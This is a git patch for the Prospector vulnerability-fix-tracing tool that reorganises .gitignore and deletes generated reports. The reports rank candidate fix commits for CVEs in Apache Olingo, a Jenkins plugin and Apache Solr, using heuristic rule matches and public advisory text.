- java.util.Calendar - java.util.Date - java.sql.Timestamp - java.lang.Long EdmDate - java.time.LocalDate - java.sql.Date EdmTimeOfDay - java.time.LocalTime - java.sql.Time Only these mappings capture the semantics correctly. For legacy reasons also supported are the following mappings are still supported: EdmDate - java.util.Calendar (date component in the TZ of the calendar) - java.util.Date (date component in UTC) - java.sql.Timestamp (date component in UTC) - java.lang.Long (date component in UTC) EdmTimeOfDay - java.util.Calendar (time component in the TZ of the calendar) - java.util.Date (time component in UTC) - java.sql.Timestamp (time component in UTC) - java.lang.Long (time component in UTC) For legacy reasons the default mapping types are unchanged (and remain semantically incorrect): EdmDateTimeOffset -> java.sql.Timestamp EdmDate -> java.util.Calendar EdmTimeOfDay -> java.util.Calendar * Allow additional (but semantically wrong) conversions EdmDate -> java.util.Date, java.sql.Timestamp EdmTimeOfDay -> java.util.Date, java.sql.Timestamp
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/commons-core/src/main/java/org/apache/olingo/commons/core/edm/primitivetype/EdmDate.java + + lib/commons-core/src/main/java/org/apache/olingo/commons/core/edm/primitivetype/EdmDateTimeOffset.java + + lib/commons-core/src/main/java/org/apache/olingo/commons/core/edm/primitivetype/EdmTimeOfDay.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + Merge pull request #56 from ianwallen/OLINGO-1400 [OLINGO-1400]... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 8 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_MSG + + BUG_IN_MESSAGE + + GITHUB_ISSUE_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 43010c72e3715118368d069d5492358a93b578f1 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message and the advisory description contain the following keywords: request, provide, call
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1400
      +
    • + +
    • +
      The commit message references some github issue: 56
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      Merge pull request #56 from ianwallen/OLINGO-1400 [OLINGO-1400] Remove duplicate call to provider.getEntityContainer() in EdmProviderImpl.createEntityContainer
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1421]Handling incorrect message in UriHelperImpl + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + a1dfb5596b4266f30ae503d3d3e116f269561640 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      An advisory keyword is contained in the changed files: resource, server
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1421
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1421]Handling incorrect message in UriHelperImpl
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/server-api/src/main/java/org/apache/olingo/server/api/serializer/SerializerException.java + + lib/server-core/src/main/java/org/apache/olingo/server/core/uri/UriHelperImpl.java + + lib/server-core/src/main/resources/server-core-exceptions-i18n.properties + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1417]Serach query to support + + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 1df2f4aa67e9ed5c3cc10f3abc65f9e1fd7ee042 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      An advisory keyword is contained in the changed files: server
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1417
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1417]Serach query to support +
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/server-core/src/main/java/org/apache/olingo/server/core/uri/parser/search/SearchTokenizer.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1417]OData V4: Adopt search option based on new V4 abnf + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + dfe1dd288c4f706a91b59a620f30c0c60b2ce1d7 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      An advisory keyword is contained in the changed files: server
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1417
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1417]OData V4: Adopt search option based on new V4 abnf
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/server-core/src/main/java/org/apache/olingo/server/core/uri/parser/search/SearchTokenizer.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1414] Updated netty-codec to 4.1.43.Final + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + SEC_KEYWORDS_IN_LINKED_BUG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 356cdbd3d8b95b2aa7bbc7b3114516c3c2eb30ce +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The bug tracking ticket OLINGO-1414 contains some security-related terms: vulnerability
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1414
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1414] Updated netty-codec to 4.1.43.Final
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + pom.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1408] Fix tests + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 636fdde13dda35d9decae1768d9846f04bb355d9 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      An advisory keyword is contained in the changed files: server
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1408
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1408] Fix tests
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/server-tecsvc/src/main/java/org/apache/olingo/server/tecsvc/data/DataCreator.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + Merge pull request #59 from artem-smotrakov/better-xml-parsing... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_MSG + + GITHUB_ISSUE_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 3cf93d5e061bad59b57c7ccd938fad8ba1a187b0 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message and the advisory description contain the following keywords: request
      +
    • + +
    • +
      The commit message references some github issue: 59
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      Merge pull request #59 from artem-smotrakov/better-xml-parsing Better XML parsing
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1407] Updated dependency versions + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_MSG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 85d660c6d87e9a45493bc29306bd6d065af8a88e +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message and the advisory description contain the following keywords: version
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1407
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1407] Updated dependency versions
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + pom.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1407] Updated Jackson version + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 6 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + ADV_KEYWORDS_IN_MSG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + ae416b56094b046a6c9882c67b7fb268b56f1644 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message and the advisory description contain the following keywords: version
      +
    • + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1407
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1407] Updated Jackson version
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + pom.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1406] Added scm link + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 2 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + ba36402dede2b3a9ef5e58a91866567efa9b41f8 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1406
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1406] Added scm link
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + pom.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + [OLINGO-1408] Minor change to fix tests + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 2 +
    + +
    +
    +
    + + Tag: 4.10.0 +
    +
    +
    +
    +
    + + + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + ec603917e5cc7bc5c8caf917435ec890b632fd84 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message references some bug tracking ticket: OLINGO-1408
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      [OLINGO-1408] Minor change to fix tests
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lib/commons-core/src/main/java/org/apache/olingo/commons/core/edm/primitivetype/EdmDateTimeOffset.java + +
    • +
    + + + +
    +
    +
    + +
    +
    +
    +
    +
    + + + + + + + + + + \ No newline at end of file From bcf7279926ba575a95afac1e32169f20cfa944d3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:10:47 +0000 Subject: [PATCH 010/130] orders and cleans up gitignore --- .gitignore | 46 +- ..._5806f368-d4f2-44cb-84ba-c5513bb9c3de.html | 300 - ..._5806f368-d4f2-44cb-84ba-c5513bb9c3de.json | 123 - ..._5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html | 5477 --- ..._5b183fbd-ef84-47a0-8190-03dbf8a9a97d.json | 2157 - ..._dadd7e2d-e33b-4fb8-85af-5850284379d9.html | 353 - ..._dadd7e2d-e33b-4fb8-85af-5850284379d9.json | 144 - ..._f6df4f22-2cce-453a-80a8-615cc55b8664.html | 32435 ---------------- ..._f6df4f22-2cce-453a-80a8-615cc55b8664.json | 20090 ---------- ..._08be8d94-00cf-4453-81ef-4d48d7ebf7ec.html | 16695 -------- ..._08be8d94-00cf-4453-81ef-4d48d7ebf7ec.json | 5841 --- ..._c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.html | 9552 ----- ..._c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.json | 2402 -- ..._1c52c1c9-aabf-4a15-8a28-7516cb2f2321.html | 8564 ---- ..._1c52c1c9-aabf-4a15-8a28-7516cb2f2321.json | 2333 -- prospector/pipeline/reports/report.html | 0 prospector/pipeline/reports/report1.html | 4518 --- 17 files changed, 19 insertions(+), 111011 deletions(-) delete mode 100644 prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html delete mode 100644 prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json delete mode 100644 prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html delete mode 100644 prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.json delete mode 100644 prospector/pipeline/reports/CVE-2024-2216_dadd7e2d-e33b-4fb8-85af-5850284379d9.html delete mode 100644 prospector/pipeline/reports/CVE-2024-2216_dadd7e2d-e33b-4fb8-85af-5850284379d9.json delete mode 100644 prospector/pipeline/reports/CVE-2024-23897_f6df4f22-2cce-453a-80a8-615cc55b8664.html delete mode 100644 prospector/pipeline/reports/CVE-2024-23897_f6df4f22-2cce-453a-80a8-615cc55b8664.json delete mode 100644 prospector/pipeline/reports/CVE-2024-39810_08be8d94-00cf-4453-81ef-4d48d7ebf7ec.html delete mode 100644 prospector/pipeline/reports/CVE-2024-39810_08be8d94-00cf-4453-81ef-4d48d7ebf7ec.json delete mode 100644 prospector/pipeline/reports/CVE-2024-41674_c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.html delete mode 100644 prospector/pipeline/reports/CVE-2024-41674_c20f61cc-bfe0-46b2-9ea8-514f2c20e33c.json delete mode 100644 prospector/pipeline/reports/CVE-2024-42472_1c52c1c9-aabf-4a15-8a28-7516cb2f2321.html delete mode 100644 prospector/pipeline/reports/CVE-2024-42472_1c52c1c9-aabf-4a15-8a28-7516cb2f2321.json delete mode 100644 prospector/pipeline/reports/report.html delete mode 100644 prospector/pipeline/reports/report1.html diff --git a/.gitignore b/.gitignore index f889bfb8c..8d79fa9b0 100644 --- a/.gitignore +++ b/.gitignore @@ -1,9 +1,23 @@ +# General site **/merge.log -.kaybee */cpu.prof *.pyc *git-cache* +*.log +*.log.* +**/cov_html +.coverage +similarities.csv + +# Virtual environment +**/.venv/ + +# VSCode Settings +**/.vscode/ + +# Regarding KB +.kaybee kaybee/internal/repository/profile001.pdf kaybee/internal/repository/repository.test kaybee/internal/tasks/.kaybee @@ -12,10 +26,9 @@ kaybee/internal/tasks/profile001.pdf kaybee/internal/tasks/tasks.test kaybee/internal/repository/cpu.prof kaybee/kaybee.code-workspace -.vscode/launch.json -.vscode/task.code-snippets kaybee/coverage.out kaybee/kaybee +kaybee/internal/reconcile/debug.test kaybee/internal/.kaybee/**/* kaybee/dist/** kaybee/kaybeeconf.yaml @@ -25,9 +38,9 @@ kaybee/steady.sh kaybee/kaybeeconf-custom.yaml kaybee/kaybee-new-statements kaybee/pkged.go -*.log -*.log.* kaybeeconf.yaml + +# Regarding Prospector prospector/.env prospector/workspace.code-workspace prospector/disabled_tests/skip_test-commits.db @@ -35,40 +48,19 @@ prospector/disabled_tests/skip_test-vulnerabilities.db prospector/tracer_dataset_final_2 prospector/results prospector/*.py -prospector/.vscode/launch.json -prospector/.vscode/settings.json prospector/install_fastext.sh -prospector/nvd.ipynb -prospector/data/nvd.pkl -prospector/data/nvd.csv -prospector/data_sources/reports -.vscode/settings.json prospector/cov_html/* -prospector/client/cli/cov_html/* prospector/config.yaml -prospector/client/web/node-app/node_modules prospector/.coverage.* prospector/.coverage -**/cov_html prospector/cov_html -.coverage -prospector/.venv prospector/prospector.code-workspace prospector/requests-cache.sqlite prospector/prospector-report.html prospector/test_report.html prospector/test_report.json prospector/.idea/* -similarities.csv prospector/*.html prospector/*.json -requests-cache.sqlite -prospector/output.png -prospector/output.pstats -prospector/kaybee-new-statements -prospector/run.sh -prospector/cve_data prospector/evaluation -.DS_Store -kaybee/internal/reconcile/debug.test -prospector/client/web/node-app/build +.DS_Store \ No newline at end of file diff --git a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html deleted file mode 100644 index 979fd8aba..000000000 --- a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.html +++ /dev/null @@ -1,300 +0,0 @@ - - - - - - - - - - - - - - - - Prospector Report - - - - -
    -
    -
    - - - -
    -

    Advisory Record

    - CVE-2019-16572
    -

    Jenkins Weibo Plugin 1.0.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.

    - - - -
    Other relevant keywords
    -

    - -

  • access
  • - - -
  • configuration
  • - - -
  • credential
  • - - -
  • file
  • - - -
  • jenkins
  • - - -
  • master
  • - - -
  • plugin
  • - - -
  • store
  • - - -
  • system
  • - - -
  • user
  • - - -
  • view
  • - - -
  • weibo
  • - - -

    - -
    - - - -
    -
    -
    Execution Statistics
    - -
    -
    -
    • core
      • retrieval of commit candidates
        • execution time = 0.002072 seconds
      • git
        • git
          • Git
            • create_commits
              • execution time is a list of numbers
                • average = 0.0009302739053964615 seconds
                • deviation = 0.001300225008205017 seconds
                • median = 0.0009302739053964615 seconds
                • count = 2
                • sum = 0.001860547810792923 seconds
      • candidates = 0 commits
      • commit preprocessing
        • execution time = 0.0001336 seconds
      • candidates analysis
        • execution time = 0.02646 seconds
      • execution time = 1.808 seconds
    • rules
      • active = 17 rules
      • matches = 0 matches
    • LLM
      • repository_url
        • execution time = 1.429 seconds
    -
    -
    - -
    - -
    -
    -
    -
    -

    Prospector Report

    -
    - - -
    -
    - -
    -
    -
    -
    -
    - - - - - - - - - - \ No newline at end of file diff --git a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json b/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json deleted file mode 100644 index d4e4a4dbf..000000000 --- a/prospector/pipeline/reports/CVE-2019-16572_5806f368-d4f2-44cb-84ba-c5513bb9c3de.json +++ /dev/null @@ -1,123 +0,0 @@ -{ - "parameters": { - "vulnerability_id": "CVE-2019-16572", - "repository_url": "https://github.com/jenkinsci/jenkins", - "version_interval": "None:1.0.2", - "use_backend": "always", - "backend_address": "http://backend:8000", - "git_cache": "/data/gitcache", - "limit_candidates": 2000, - "use_llm_repository_url": true, - "enabled_rules": [ - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_LINKED_ISSUE", - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_BUG", - "GITHUB_ISSUE_IN_MESSAGE", - "BUG_IN_MESSAGE", - "COMMIT_HAS_TWINS", - "COMMIT_IS_SECURITY_RELEVANT" - ] - }, - "advisory_record": { - "cve_id": "CVE-2019-16572", - "description": "Jenkins Weibo Plugin 1.0.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "reserved_timestamp": 1568937600, - "published_timestamp": 1576593655, - "updated_timestamp": 1723232643, - "repository_url": null, - "references": { - "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1597": 2, - "http://www.openwall.com/lists/oss-security/2019/12/17/1": 2 - }, - "affected_products": [ - "Plugin", - "Weibo", - "Jenkins", - "Jenkins Weibo Plugin" - ], - "versions": { - "lessThanOrEqual": "1.0.1", - "status": "affected", - "version": "unspecified", - "versionType": "custom" - }, - "files": [], - "keywords": [ - "store", - "credential", - "system", - "access", - "user", - "plugin", - "view", - "file", - "master", - "configuration", - "weibo", - "jenkins" - ], - "files_extension": [], - "has_fixing_commit": false - }, - "commits": [], - "processing_statistics": { - "core": { - "retrieval of commit candidates": { - "execution time": [ - 0.0020722728222608566 - ] - }, - "git": { - "git": { - "Git": { - "create_commits": { - "execution time": [ - 0.0018496718257665634, - 1.0875985026359558e-05 - ] - } - } - } - }, - "candidates": 0, - "commit preprocessing": { - "execution time": [ - 0.00013364851474761963 - ] - }, - "candidates analysis": { - "execution time": [ - 0.026456749066710472 - ] - }, - "execution time": [ - 1.8081965018063784 - ] - }, - "rules": { - "active": [ - 17 - ], - "matches": [ - 0 - ] - }, - "LLM": { - "repository_url": { - "execution time": [ - 1.4294230211526155 - ] - } - } - } -} \ No newline at end of file diff --git a/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html b/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html deleted file mode 100644 index 3fd6526ab..000000000 --- a/prospector/pipeline/reports/CVE-2023-50298_5b183fbd-ef84-47a0-8190-03dbf8a9a97d.html +++ /dev/null @@ -1,5477 +0,0 @@ - - - - - - - - - - - - - - - - Prospector Report - - - - -
    -
    -
    - - -

    Filters

    -

    - Use the slider to filter out lower relevance scores and the button to collapse or expand all the commits. -

    - -
    -
    - -
    -
    - -
    -
    - - - - -
    -

    Advisory Record

    - CVE-2023-50298
    -

    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. - -Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. -When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. -An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, -then send a streaming expression using the mock server's address in "zkHost". -Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. - -Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. -From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting. - -

    - - -
    Possible relevant files/methods
    -

    -

      - -
    • ACLs
    • - -
    • Solr
    • - -
    • SolrCloud
    • - -
    • This
    • - -
    • zkHost
    • - -
    • ZooKeeper
    • - -
    -

    - - -
    Other relevant keywords
    -

    - -

  • accept
  • - - -
  • actor
  • - - -
  • address
  • - - -
  • affect
  • - - -
  • allow
  • - - -
  • apache
  • - - -
  • attacker
  • - - -
  • chroot
  • - - -
  • clouds
  • - - -
  • connect
  • - - -
  • credential
  • - - -
  • datum
  • - - -
  • expose
  • - - -
  • exposure
  • - - -
  • expression
  • - - -
  • expressions
  • - - -
  • extract
  • - - -
  • give
  • - - -
  • handler
  • - - -
  • have
  • - - -
  • information
  • - - -
  • issue
  • - - -
  • parameter
  • - - -
  • permission
  • - - -
  • provide
  • - - -
  • read
  • - - -
  • recommend
  • - - -
  • request
  • - - -
  • send
  • - - -
  • sensitive
  • - - -
  • server
  • - - -
  • setup
  • - - -
  • solr
  • - - -
  • solrcloud
  • - - -
  • stream
  • - - -
  • streaming
  • - - -
  • unauthorized
  • - - -
  • upgrade
  • - - -
  • user
  • - - -
  • value
  • - - -
  • version
  • - - -
  • vulnerability
  • - - -
  • zookeeper
  • - - -

    - -
    - - - -
    -
    -
    Execution Statistics
    - -
    -
    -
    • core
      • retrieval of commit candidates
        • execution time = 0.02454 seconds
      • git
        • git
          • Git
            • create_commits
              • execution time = 0.02434 seconds
      • candidates = 41 commits
      • commit preprocessing
        • execution time = 0.05642 seconds
      • candidates analysis
        • execution time = 0.3947 seconds
      • save commits to backend
        • execution time = 0.03555 seconds
      • execution time = 2.898 seconds
    • rules
      • active = 17 rules
      • matches = 167 matches
    • LLM
      • repository_url
        • execution time = 1.664 seconds
      • commit_classification
        • execution time is a list of numbers
          • average = 0.016033098846673966 seconds
          • deviation = 0.0008028324026679636 seconds
          • median = 0.01598429959267378 seconds
          • count = 10
          • sum = 0.16033098846673965 seconds
    -
    -
    - -
    - -
    -
    -
    -
    -

    Prospector Report

    -
    - - -
    -
    - -
    - -
    -
    -
    -
    -
    - SOLR-17098: Only use ZK ACLs for default ZK Host (cherry picked from... - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 98 -
    - -
    -
    -
    - - Tag: releases/lucene-solr/8.11.3 -
    -
    -
    -
    -
    - - - - COMMIT_IS_SECURITY_RELEVANT - - XREF_BUG - - RELEVANT_WORDS_IN_MESSAGE - - CHANGES_RELEVANT_CODE - - CHANGES_RELEVANT_FILES - - SEC_KEYWORDS_IN_LINKED_BUG - - ADV_KEYWORDS_IN_FILES - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 61c956c426b2cfb85ccef55d1afca4335eacd269 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      -
    • - -
    • -
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-17098
      -
    • - -
    • -
      The commit message contains some relevant words: ACLs
      -
    • - -
    • -
      The commit modifies code containing relevant filename or methods: This, ZooKeeper, Solr, ACLs, zkHost
      -
    • - -
    • -
      The commit changes some relevant files: solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java, solr/solr-ref-guide/src/stream-decorator-reference.adoc, solr/core/src/java/org/apache/solr/core/CoreContainer.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudHttp2SolrClient.java, solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java, solr/solrj/src/test-files/solrj/solr/solr.xml, solr/solrj/src/java/org/apache/solr/common/cloud/SolrZkClient.java, solr/solr-ref-guide/src/stream-source-reference.adoc, solr/solrj/src/java/org/apache/solr/client/solrj/impl/ZkClientClusterStateProvider.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudSolrClient.java
      -
    • - -
    • -
      The bug tracking ticket SOLR-17098 contains some security-related terms: security
      -
    • - -
    • -
      An advisory keyword is contained in the changed files: read, stream, provide, clouds
      -
    • - -
    • -
      The commit message references some bug tracking ticket: SOLR-17098
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      SOLR-17098: Only use ZK ACLs for default ZK Host (cherry picked from commit e2bf1f434aad873fbb24c21d46ac00e888806d98)
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - solr/core/src/java/org/apache/solr/core/CoreContainer.java - - solr/solr-ref-guide/src/stream-decorator-reference.adoc - - solr/solr-ref-guide/src/stream-source-reference.adoc - - solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudHttp2SolrClient.java - - solr/solrj/src/java/org/apache/solr/client/solrj/impl/CloudSolrClient.java - - solr/solrj/src/java/org/apache/solr/client/solrj/impl/ZkClientClusterStateProvider.java - - solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java - - solr/solrj/src/java/org/apache/solr/common/cloud/SolrZkClient.java - - solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java - - solr/solrj/src/test-files/solrj/solr/solr.xml - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - SOLR-16777: Fix for Schema Designer blindly trusting potentially... - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 94 -
    - -
    -
    -
    - - Tag: releases/lucene-solr/8.11.3 -
    -
    -
    -
    -
    - - - - COMMIT_IS_SECURITY_RELEVANT - - XREF_BUG - - CHANGES_RELEVANT_CODE - - CHANGES_RELEVANT_FILES - - SEC_KEYWORDS_IN_LINKED_BUG - - SEC_KEYWORDS_IN_MESSAGE - - ADV_KEYWORDS_IN_FILES - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 4ac1d59918c250bffb09899572bd92054cee063a -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      -
    • - -
    • -
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16777
      -
    • - -
    • -
      The commit modifies code containing relevant filename or methods: Solr
      -
    • - -
    • -
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java
      -
    • - -
    • -
      The bug tracking ticket SOLR-16777 contains some security-related terms: unsafe, secure, security, insecure, malicious
      -
    • - -
    • -
      The commit message contains some security-related keywords: malicious
      -
    • - -
    • -
      An advisory keyword is contained in the changed files: handler
      -
    • - -
    • -
      The commit message references some bug tracking ticket: SOLR-16777
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      SOLR-16777: Fix for Schema Designer blindly trusting potentially malicious configsets
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - SOLR-16777: Schema Designer now correctly manages trust of the... - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 92 -
    - -
    -
    -
    - - Tag: releases/lucene-solr/8.11.3 -
    -
    -
    -
    -
